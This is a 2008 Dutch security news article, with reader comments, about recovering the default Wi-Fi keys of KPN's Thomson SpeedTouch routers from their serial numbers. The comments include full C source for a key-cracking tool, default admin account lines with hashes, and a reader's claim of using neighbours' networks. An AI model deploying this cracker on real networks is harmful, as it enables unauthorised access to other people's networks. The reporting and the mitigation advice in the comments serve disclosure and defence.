image

KPN SpeedTouch routers binnen 15 seconden te hacken

maandag 28 juli 2008, 12:01 door Redactie, 35 reacties

De SpeedTouch routers die de KPN voor zowel haar particuliere als zakelijke ADSL-aansluitingen gebruikt zijn binnen 15 seconden te hacken. De SpeedTouch routers zenden in hun standaard instelling een door iedereen te ontvangen identificatie uit, bestaande uit het woord SpeedTouch gevolgd door 6 karakters. "De KPN gebruikt voor alle routers dezelfde standaard," zo laat Piet de Bekker van het bedrijf Wi-Fi Secure tegenover Security.NL weten. Volgens De Bekker zou de KPN de enige provider zijn die dit doet.

De bevindingen van het bedrijf zijn gebaseerd op dit onderzoek dat de hackers van GNU Citizen in Groot-Brittannië uitvoerden. Zij ontdekten dat de standaard WEP/WPA sleutels en SSID van Thomson Speedtouch routers aan de hand van het serienummer zijn te achterhalen.

Er is inmiddels een tool beschikbaar die het achterhalen van de sleutels automatiseert, maar het komt erop neer dat de 'CC' en 'PP' velden van het serienummer worden verwijderd. De overgebleven waardes converteert men naar hexadecimaal en de string die hieruit komt wordt via SHA-1 gehashed. De eerste vijf bytes zijn de standaard encryptiesleutel, de overige twee of drie bytes worden geconverteerd naar een string en worden aan de routernaam toegevoegd, wat dan als SSID dient (bijvoorbeeld SpeedTouchF8A3D0).

Reacties (35)
28-07-2008, 12:21 door spatieman
VETTE shit..
28-07-2008, 12:26 door Quux
"Ook dit probleem lossen wij snel voor U op beneden de € 60,00 incl.
voorrijden excl. BTW, mits wij U binnen 15 Km vanaf het centrum van 's-
Hertogenbosch kunnen bereiken."

Het zou mijns inziens beter zijn als deze club gewoon de stappen zou laten
zien waarmee gewone gebruikers dit probleem zelf en kostenloos kunnen
oplossen...
28-07-2008, 12:28 door Anoniem
Let op: alleen voor Wifi access en alleen indien
eindgebruikers standaard settings niet hebben aangepast
(niet dat dat niet genoeg is, maar de titel van het artikel
is een beetje overtrokken...)

Oplossing is eenvoudig, gewoon netjes zelf wifi opzetten

J.
28-07-2008, 12:34 door Anoniem
Dit gaat dus om de Experia boxen en niet om ST780 toestellen
die geleverd worden bij andere providers?
28-07-2008, 12:39 door spatieman
een betere reedmeuk maken voor het instellen van beveiliging.
en het liefst ook voor meerdere OSn
28-07-2008, 12:44 door dmace
Hmm, doen ze het bij die andere routers toch beter.
28-07-2008, 12:53 door Anoniem
Volgens mij is het probleem simpel op te lossen door je SSID
aan te passen, zodat het serienummer niet meer gebroadcast
wordt. En daarnaast natuurlijk NOOIT standaard wachtwoorden
of sleutels gebruiken...
28-07-2008, 13:03 door Anoniem
Dit is oud nieuws... is al heel lang bekend...

Je moet gewoon zorgen dat je je SSID en wachtwoord
verandert, dan is er niks aan de hand. De hack werkt alleen
maar als je de standaard instellingen laat staan...

Of de SSID broadcast helemaal uit zetten, ben je er ook.


Het zou mijns inziens beter zijn als deze club gewoon de
stappen zou laten
zien waarmee gewone gebruikers dit probleem zelf en
kostenloos kunnen
oplossen...

1. log in op je router (meestal http://10.0.0.138 of
http://192.168.1.254)
2. verander de SSID
3. verander verander je WPA key
4. opslaan
5. klaar
28-07-2008, 13:37 door Anoniem
Door Anoniem
Of de SSID broadcast helemaal uit zetten, ben je er ook.

Dit is een voorbeeld van "security through obscurity" die
niet werkt. Je weet het standaard formaat van de SSID. Er is
een beperkt aantal mogelijkheden. Die scan je in een paar
seconden.

Daarnaast zal een (windows) laptop datzelfde SSID uitzenden
als hij geen verbinding kan krijgen met het accesspoint. Je
kunt dan zelfs even net doen alsof je dat accesspoint bent.
Zelfs de key kun je lokaal instellen zodat het er voor de
gebruiker uitziet alsof hij op zijn eigen (beveiligde)
accesspoint zit.

Je kunt het zelfs doen als het accesspoint bestaat. Met een
richtantenne op de laptop gericht zal die liever het
sterkere (valse) signaal gebruiken dan dat van het goede
accesspoint.

Peter
28-07-2008, 14:37 door Thing
Misschien moet er even duidelijk in de kop dat het Wireless
Speedtouch Routers betreft. Dit artikel geeft in ieder geval
aan waarom ik nog steeds geen fiducie in wireless wens te
hebben ;)
28-07-2008, 14:46 door Anoniem
wat overdreven dit en de titel is ook overdreven, trekt wel de aandacht :)
28-07-2008, 14:51 door Anoniem
Door Thing
Misschien moet er even duidelijk in de kop dat het Wireless
Speedtouch Routers betreft. Dit artikel geeft in ieder geval
aan waarom ik nog steeds geen fiducie in wireless wens te
hebben ;)

Dit toont alleen aan dat nog steeds leveranciers niet de
moeite willen nemen om hun klanten veilige producten te
leveren. Er zijn voldoende manieren om wireless veilig te maken.

In het verleden zijn vergelijkbare fouten gemeld over
standaard username/wachtwoord combinaties van ADSL modems.
Hiermee was het eenvoudig mogelijk om die modems vanaf
internet over te nemen. Toen je dat las was het voor jou ook
duidelijk waarom je geen fiducie in ADSL had?

Peter
28-07-2008, 16:23 door fd0
bij diezelfde provider, maar ook bij dochter xs4all, is het
modem zodanig ingesteld, als deze niet in bridging mode
staat er een default username/password in staat om het modem
op afstand te manipuleren.


add name=Administrator
password=_CYP_d09efad4bcbceb3f19264bf1eadd2254 role=root
hash2=cf7a7b262a130db438f361fbef6cd9b9 defuser=enabled

add name=tech password=_CYP_d11009d9e61c93d42fc7d0f14cc6e17c
role=TechnicalSupport hash2=c15057c8f720e13f8e748f75ca6c6bee
defremadmin=enabled
28-07-2008, 17:52 door Anoniem
Komkommertijd? Ik heb wel eens met zo'n Experiabox lopen
stoeien, en daar mag je echt niks. Als ik naar mijn eigen ST
doos kijk mag ik als admin veel meer dan de gewone gebruiker.

Leuk is ook dat iedere boerenl*l die toegang heeft tot het
draadloze netwerk ook toegang heeft tot de webinterface. Je
hoeft geen wachtwoord in te voeren. 192.168.1.254 intypen en
je zit in de webinterface.

Zo maak je het wel heel erg gemakkelijk, zeker als je ook
VOIP/SIP hebt via de experiabox. De gebelde en ontvangen
nummers staan vrolijk met datum, tijd en gespreksduur in een
log vermeld.
28-07-2008, 18:15 door Anoniem
Door fd0
bij diezelfde provider, maar ook bij dochter xs4all, is het
modem zodanig ingesteld, als deze niet in bridging mode
staat er een default username/password in staat om het modem
op afstand te manipuleren.


add name=Administrator
password=_CYP_d09efad4bcbceb3f19264bf1eadd2254 role=root
hash2=cf7a7b262a130db438f361fbef6cd9b9 defuser=enabled

add name=tech password=_CYP_d11009d9e61c93d42fc7d0f14cc6e17c
role=TechnicalSupport hash2=c15057c8f720e13f8e748f75ca6c6bee
defremadmin=enabled
Ik kan niet vertellen of het Administrator wachtwoord bij
default hetzelfde is (meen mij te herinneren van wel), maar
het tech wachtwoord wordt volgens mij automatisch elke keer
opnieuw gegenereerd als je tech wil laten inloggen (is
zoiets als het "remote helpdesk" account; ik zit op dit
moment niet achter een SpeedTouch).

Helaas zijn er geen gemakkelijke antwoorden op vragen als
“willen we dit soort complexe apparatuur door de gemiddelde
computergebruiker laten inrichten en beheren en zo niet:
door wie dan wel?”, “wat moet er default openstaan naar de
WAN kant”, “wat is voldoende encryptie qua wireless” etc. etc.

Neemt niet weg dat het een (knap gevonden) ongelooflijk
domme ontwerpfout is.
28-07-2008, 18:32 door Nomen Nescio
Ik vraag me bij dit soort alarmverhalen altijd weer af: hoeveel zijn er nou echt
door getroffen? Dat hoor je nooit.
28-07-2008, 22:15 door Anoniem
Door Nomen Nescio
Ik vraag me bij dit soort alarmverhalen altijd weer af:
hoeveel zijn er nou echt
door getroffen? Dat hoor je nooit.

Totdat dit bericht verscheen met de link naar het tooltje
zullen er niet zo heel veel slachtoffers zijn. Nu kan iedere
boerenl*l de cracker uithangen..

Ik heb de link naar een kennis gestuurd die ook zo'n
apparaat heeft. Die is goed geschrokken van de snelheid
waarmee de goede key tevoorschijn kwam.
28-07-2008, 22:42 door extranion
Door Nomen Nescio
Ik vraag me bij dit soort alarmverhalen altijd weer af:
hoeveel zijn er nou echt
door getroffen? Dat hoor je nooit.

denk ik ook erg moeilijk te achterhalen,
aangezien een hoop mensen geen eens door hebben als er
iemand in hun netwerk zit rond te kijken.

toch vind ik het wel schandalig dat ze zoiets gedaan
hebben, hoezo valse veiligheid...
28-07-2008, 23:04 door Anoniem
Dit is heel oud nieuws. Na het verschijnen van het gnu
citizen artikel heb ik uit diverse hoeken al vernomen dat
het in de speedtouch van kpn ook mis zat. Iemand probeert
kennelijk weer geld te slaan uit opschudding (zie reclame
onderaan de pagina van de 'ontdekker'). Welkom bij
security.nl, het nieuwe reclame platform voor de it-security
branche.
28-07-2008, 23:49 door Anoniem
Door Nomen Nescio
Ik vraag me bij dit soort alarmverhalen altijd weer af:
hoeveel zijn er nou echt
door getroffen? Dat hoor je nooit.


Vandaag 6 ssid's getest met speedtouch in de naam. 6 keer
verbinding met het internet via andermans netwerk. Lijkt mij
dus vrij serieus met een score van 100%.
29-07-2008, 01:40 door Niko O
Erg vreemd dat je dit als zakelijke klant uit de pers moet
vernemen.
Gelukkig dat een aantal kenners zonder hier 60 euro voor te
vragen even kan vertellen hoe het dan wel moet.
Mijn tip : deel de kennis, dan komen we allemaal weer een
stukje verder !

Verder lijkt het me een goed idee om een soort KEMA
veiligheids norm, met de mogelijkheid van schade vergoeding.
Dan worde deze partijen wel wat voorzichtiger. KPN is heer
en meester !!
29-07-2008, 08:41 door Wuerfel
Door Niko O
Erg vreemd dat je dit als zakelijke klant uit de pers moet
vernemen.
Gelukkig dat een aantal kenners zonder hier 60 euro voor te
vragen even kan vertellen hoe het dan wel moet.
Mijn tip : deel de kennis, dan komen we allemaal weer een
stukje verder !

Verder lijkt het me een goed idee om een soort KEMA
veiligheids norm, met de mogelijkheid van schade vergoeding.
Dan worde deze partijen wel wat voorzichtiger. KPN is heer
en meester !!
Of simpelweg niet akkoord gaan met het automagisch gedonfigureerd
apparaat.
29-07-2008, 09:24 door Anoniem
Door Anoniem
Dit toont alleen aan dat nog steeds leveranciers niet de
moeite willen nemen om hun klanten veilige producten te
leveren. Er zijn voldoende manieren om wireless veilig te
maken.
Er zijn manieren om wireless veiliger
te maken, maar niet veilig in absolute zin. Buiten dat is in
den lande een aandeel gedateerde apparatuur in gebruik, die
bijvoorbeeld nog alleen WEP ondersteunt.
29-07-2008, 09:32 door Anoniem
Door Niko O
KPN is heer en meester !!
Duh !?

Doe gewoon een beetje moeite een fatsoenlijke ISP te vinden,
die zijn er zat.
Als ik ergens de pest aan heb zijn het zakelijke gebruikers
die een budget-mentaliteit hanteren en dan achteraf zeiken
omdat ze een topproduct 'verwachtten'.....
29-07-2008, 10:51 door Anoniem
Het probleem zit niet in de modem maar in de handleiding die
KPN (ook xs4all) bij de modem meegeeft. Daarin staat gewoon
dat je de meegeleverde WPA key in moet vullen. Een gewone
gebruiker zal dit gewoon doen. Ga dit nu nog maar eens
terugdraaien bij al die gebruikers.
29-07-2008, 18:05 door Anoniem
Hier is wat simpele python code die je kan gebruiken om te kijken of dit werkt
voor JOUW EIGEN SpeedTouch access point: http://kip.sateh.com/speedtouch.py
13-08-2008, 22:35 door Anoniem
ALs je je ssid enkelt veranderd dan ben je al van dit probleem af althans wat
betreft deze tool.

Hoe kan je je ssid veranderen.
1 je opend je browser meestal voor windhoos gebruikers die grote blauwe E
2 je m,aakt de adresbalk leeg en toetst in 10.0.0.138
3 je gaat naar basic dan naar wireless veranderd bij Network name (SSID): de
ssid naar bladiebladiebla en hatsaa ben je hier ook weer van af.

Maar goed dan heb je weer zoeits als Backtrack waar je ook heel simpel weer
wep/wpakey mee vergaart.
12-09-2008, 22:45 door Anoniem
Door spatiemanVETTE shit..


Lol en dan laten ze het nog online staan ook die toool !!!!
01-02-2009, 02:24 door Anoniem
Door AnoniemALs je je ssid enkelt veranderd dan ben je al van dit probleem af althans wat
betreft deze tool.

Hoe kan je je ssid veranderen.
1 je opend je browser meestal voor windhoos gebruikers die grote blauwe E
2 je m,aakt de adresbalk leeg en toetst in 10.0.0.138
3 je gaat naar basic dan naar wireless veranderd bij Network name (SSID): de
ssid naar bladiebladiebla en hatsaa ben je hier ook weer van af.

Maar goed dan heb je weer zoeits als Backtrack waar je ook heel simpel weer
wep/wpakey mee vergaart.

Een SSID is altijd te hacken ook al heeft de router SSID broadcasting uitstaan
Dit komt omdat je dan alle packetjes doorkijkt die langskomen, daar zit alsnog de SSID in.
dat duurt ongeveer 10 seconden. Het kraken van WEP kan altijd. En WPA / WPA-PSK / WPA2-PSK kan je ook kraken alleen dit duurt langer omdat de router dan een wpa handshake gebruikt die je niet zomaar kan kraken(ze zijn er wel mee bezig). Zo'n WPA-handshake moet je dan kraken met behulp van een dictionary of je doet het bruteforce
18-11-2010, 12:52 door Anoniem
Jongens gewoon de ssid naam veranderen dan kan niemand wat dioen !
60 euro om het op te lossen ik lag me dood wat een afzetter zeg
28-12-2010, 14:58 door Anoniem
ARV75190A5502
28-12-2010, 15:00 door Anoniem
ARV75190A5502
06-01-2011, 23:12 door Anoniem
Voor mensen die zich vervelen:
broncode van het programma'tje
zelf ergens sha1.h vandaan googlen


#include <stdio.h>
#include <getopt.h>

#include "sha1.h"

#define SHA1Init SHA1Reset
#define SHA1Update SHA1Input
#define SHA1Final SHA1Result
#define SHA1_CTX SHA1Context

typedef unsigned char u8;
typedef unsigned int u32;


#define SERIAL_LENGTH 12
#define MAX_SSID_OCTETS 6
#define DEFAULT_KEY_SIZE 5

const u8 charTable[]="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const u8 hexTable[]="0123456789ABCDEF";
u8 serial[13]={'C','P','0',0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
#define hexmsb(x)(hexTable[((x & 0xf0) >> 4)])
#define hexlsb(x)(hexTable[ (x & 0x0f)])

void usage(char **argv) {

fprintf(stdout,"\n\tUso: %s [ -i <ssid octets> ] [ -o <output file> ]\n"
"\n\t -i : Los octetos hexadecimales del SSID del router Thomson"
"\n\t -o : Especificar el fichero de salida para las posibles claves"
"\n\t -v : Imprime en pantalla las posibles claves encontradas\n\n",*argv);

exit(0);
}

/*
* convert hexadecimal ssid string to binary
* return 0 on error or binary length of string
*
*/
u32 str2ssid(u8 ssid[],u8 *str) {

u8 *p,*q = ssid;
u32 len = strlen(str);

if( (len % 2) || (len > MAX_SSID_OCTETS) )
return(0);

for(p = str;(*p = toupper(*p)) && (strchr(hexTable,*p)) != 0;) {

if(--len % 2) {
*q = ((u8*)strchr(hexTable,*p++) - hexTable);
*q <<= 4;
}else {
*q++ |= ((u8*)strchr(hexTable,*p++) - hexTable);
}
}
return( (len) ? 0 : (p - str) / 2);
}

/*
* print 5 bytes to output file
*
*/
void dump_key(FILE *out, u8 *key) {

u32 i;
u8 *p = key;

for(i = 0;i < DEFAULT_KEY_SIZE;i++)
fprintf(out,"%.2X",*p++);

fprintf(out,"\n");
}

int main(int argc, char **argv) {

u8 sha1_digest[40]={0};
u8 ssid[8]={0},buf[8]={0},year,week,x1,x2,x3;
u32 keys = 0,ssidLen = 0,verbose = 0, opt = 0;
u8 *p,*q,*strId = NULL;
FILE *ofile = NULL;

SHA1_CTX sha1_ctx;

if(argc > 1) {
while( (opt = getopt(argc, argv,"vo:i:")) != -1) {

switch(opt) {

case 'i' :
strId = optarg;
break;

case 'o' :
if((ofile = fopen(optarg,"wb")) == NULL) {
fprintf(stderr,"\nNo puedo abrir %s para la salida.\n",optarg);
return(0);
}
break;

case 'v' :
verbose++;
break;

default:
usage(argv);
}
}

if(!strId) usage(argv);

if(!(ssidLen = str2ssid(ssid,strId))) usage(argv);

fprintf(stdout,"\nGenerando claves... por favor espera\n\n");

// generate values only for 2005/2007..change if you want.

for(year = 5;year <= 7;year++) {

serial[3] = year | '0';

// 52 weeks of the year

for(week = 1;week <= 52;week++) {

serial[4] = (week / 10) + '0';
serial[5] = (week % 10) + '0';

for(x1 = 0;x1 < 36;x1++) {

serial[6] = hexmsb(charTable[x1]);
serial[7] = hexlsb(charTable[x1]);

for(x2 = 0;x2 < 36;x2++) {

serial[8] = hexmsb(charTable[x2]);
serial[9] = hexlsb(charTable[x2]);

for(x3 = 0;x3 < 36;x3++) {

serial[10] = hexmsb(charTable[x3]);
serial[11] = hexlsb(charTable[x3]);

// hash serial number with sha-1

SHA1Init(&sha1_ctx);
SHA1Update(&sha1_ctx,serial,SERIAL_LENGTH);
SHA1Final(&sha1_ctx,sha1_digest);

// compare SSID octets with last number of bytes supplied

if(memcmp(&sha1_digest[(20-ssidLen)],ssid,ssidLen) == 0) {

keys++;

if(verbose) {

memcpy(buf,serial,6);

fprintf(stdout,
"Número de Serie: %s**%C%C%C - posible clave = ",
buf,charTable[x1],charTable[x2],charTable[x3]);

dump_key(stdout,sha1_digest);
}
if(ofile) {
dump_key(ofile,sha1_digest);
}
}
}
}
}
}
}
fprintf(stdout,"\nResultado: %d posibles claves.\n\n",keys);

if(ofile) fclose(ofile);
}
else {
usage(argv);
}
return(0);
}
06-02-2011, 06:50 door Anoniem
Beste Forumgebruikers/reageerders,
Voor de leek die pas 15 jaar met computers werkt en elke dag veel bijleert is het bovenstaande erg interessant.
Zou iemand van u zo vriendelijk willen zijn om exact aan te geven wat ik moet doen voor de KPN Experiabox.
En wat moet ik doen bij de laptop en desktop zelf?
Verder overweeg ik de aanbeveling van het "Chip" computerblad op te volgen om een AVM Fritzbox Fon WLAN 7390 aan te schaffen. Is daar ook een "handleiding voor te maken door een van u?
Verder stond daar iets over de standaard 802.11n die de computers zouden gebruiken. De oude 11g en oude 11n zouden niet goed zijn voor de snelheid, maar hoe kom je er achter waar dat staat?
Kortom veel vragen en wellicht is er een van u die daar tijd voor wil vrij maken.
Alvast hartelijk dank, Chris
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.